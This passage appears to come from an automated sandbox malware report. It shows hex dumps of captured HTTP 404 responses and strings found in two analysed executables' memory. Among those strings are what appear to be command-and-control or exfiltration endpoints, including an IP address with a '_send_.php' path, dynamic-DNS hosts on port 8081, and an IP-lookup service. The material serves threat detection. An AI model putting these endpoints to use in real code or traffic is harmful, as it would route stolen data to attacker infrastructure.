70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1576Date: Wed, 05 Mar 2025 09:00:11 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1576Date: Wed, 05 Mar 2025 09:00:12 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1576Date: Wed, 05 Mar 2025 09:00:15 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1576Date: Wed, 05 Mar 2025 09:00:17 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1576Date: Wed, 05 Mar 2025 09:00:17 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20

Source: 20250301_173245__p20250301_173245__p.exe , 0000002E.00000002.2949149356.000000000286B000.00000004.00000800.00020000.00000000.sdmp, duencaj.exe , 0000003F.00000002.2950015087.0000000003293000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://51.38.247.67:8081/_send_.php?L
Source: 20250301_173245__p20250301_173245__p.exe , 00000001.00000002.1773144054.000000000462D000.00000004.00000800.00020000.00000000.sdmp, 20250301_173245__p20250301_173245__p.exe , 00000001.00000002.1773144054.00000000045A3000.00000004.00000800.00020000.00000000.sdmp, 20250301_173245__p20250301_173245__p.exe , 00000001.00000002.1773144054.0000000003D3C000.00000004.00000800.00020000.00000000.sdmp, duencaj.exe , 00000039.00000002.1828134469.00000000047B6000.00000004.00000800.00020000.00000000.sdmp, duencaj.exe , 00000039.00000002.1828134469.0000000003F0C000.00000004.00000800.00020000.00000000.sdmp, duencaj.exe , 0000003F.00000002.2941651605.0000000000434000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencoded
Source: 20250301_173245__p20250301_173245__p.exe , 00000001.00000002.1773144054.000000000462D000.00000004.00000800.00020000.00000000.sdmp, 20250301_173245__p20250301_173245__p.exe , 00000001.00000002.1773144054.00000000045A3000.00000004.00000800.00020000.00000000.sdmp, 20250301_173245__p20250301_173245__p.exe , 00000001.00000002.1773144054.0000000003D3C000.00000004.00000800.00020000.00000000.sdmp, 20250301_173245__p20250301_173245__p.exe , 0000002E.00000002.2949149356.0000000002761000.00000004.00000800.00020000.00000000.sdmp, duencaj.exe , 00000039.00000002.1828134469.00000000047B6000.00000004.00000800.00020000.00000000.sdmp, duencaj.exe , 00000039.00000002.1828134469.0000000003F0C000.00000004.00000800.00020000.00000000.sdmp, duencaj.exe , 0000003F.00000002.2941651605.0000000000434000.00000040.00000400.00020000.00000000.sdmp, duencaj.exe , 0000003F.00000002.2950015087.0000000003111000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://aborters.duckdns.org:8081
Source: 20250301_173245__p20250301_173245__p.exe , 00000001.00000002.1773144054.000000000462D000.00000004.00000800.00020000.00000000.sdmp, 20250301_173245__p20250301_173245__p.exe , 00000001.00000002.1773144054.00000000045A3000.00000004.00000800.00020000.00000000.sdmp, 20250301_173245__p20250301_173245__p.exe , 00000001.00000002.1773144054.0000000003D3C000.00000004.00000800.00020000.00000000.sdmp, 20250301_173245__p20250301_173245__p.exe , 0000002E.00000002.2949149356.0000000002761000.00000004.00000800.00020000.00000000.sdmp, duencaj.exe , 00000039.00000002.1828134469.00000000047B6000.00000004.00000800.00020000.00000000.sdmp, duencaj.exe , 00000039.00000002.1828134469.0000000003F0C000.00000004.00000800.00020000.00000000.sdmp, duencaj.exe , 0000003F.00000002.2941651605.0000000000434000.00000040.00000400.00020000.00000000.sdmp, duencaj.exe , 0000003F.00000002.2950015087.0000000003111000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anotherarmy.dns.army:8081
Source: duencaj.exe , 0000003F.00000002.2950015087.0000000003111000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org
Source: 20250301_173245__p20250301_173245__p.exe , 0000002E.00000002.2949149356.0000000002761000.00000004.00000800.00020000.00000000.sdmp, duencaj.exe , 0000003F.00000002.2950015087.0000000003111000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org/
Source: 20250301_173245__p20250301_173245__p.exe , 00000001.00000002.1773144054.000000000462D000.00000004.00000800.00020000.00000000.sdmp, 20250301_173245__p20250301_173245__p.exe , 00000001.00000002.1773144054.00000000045A3000.00000004.00000800.00020000.00000000.sdmp, 20250301_173245__p20250301_173245__p.exe , 00000001.00000002.1773144054.0000000003D3C000.00000004.00000800.00020000.00000000.sdmp, duencaj.exe , 00000039.00000002.1828134469.00000000047B6000.00000004.00000800.00020000.00000000.sdmp, duencaj.exe , 00000039.00000002.1828134469.0000000003F0C000.00000004.00000800.00020000.00000000.sdmp, duencaj.exe , 0000003F.00000002.2941651605.0000000000434000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org/q
Source: svchost.exe, 00000003.00000002.2951565043.0000022D1CA00000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.ver)
Source: svchost.exe, 00000003.00000003.1687408399.0000022D1CC18000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.3.dr, edb.log.3.dr	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFU
Source: edb.log.3.dr	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome/acosgr5ufcefr7w7nv4v6k4ebdda_117.0.5938.132/117.0.5
Source: edb.log.3.dr	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaa5khuklrahrby256zitbxd5wq_1.0.2512.1/n
Source: edb.log.3.dr	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaxuysrwzdnwqutaimsxybnjbrq_2023.9.25.0/
Source: svchost.exe, 00000003.00000003.1687408399.0000022D1CC18000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.3.dr, edb.log.3.dr	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adhioj45hzjkfunn7ccrbqyyhu3q_20230916.567
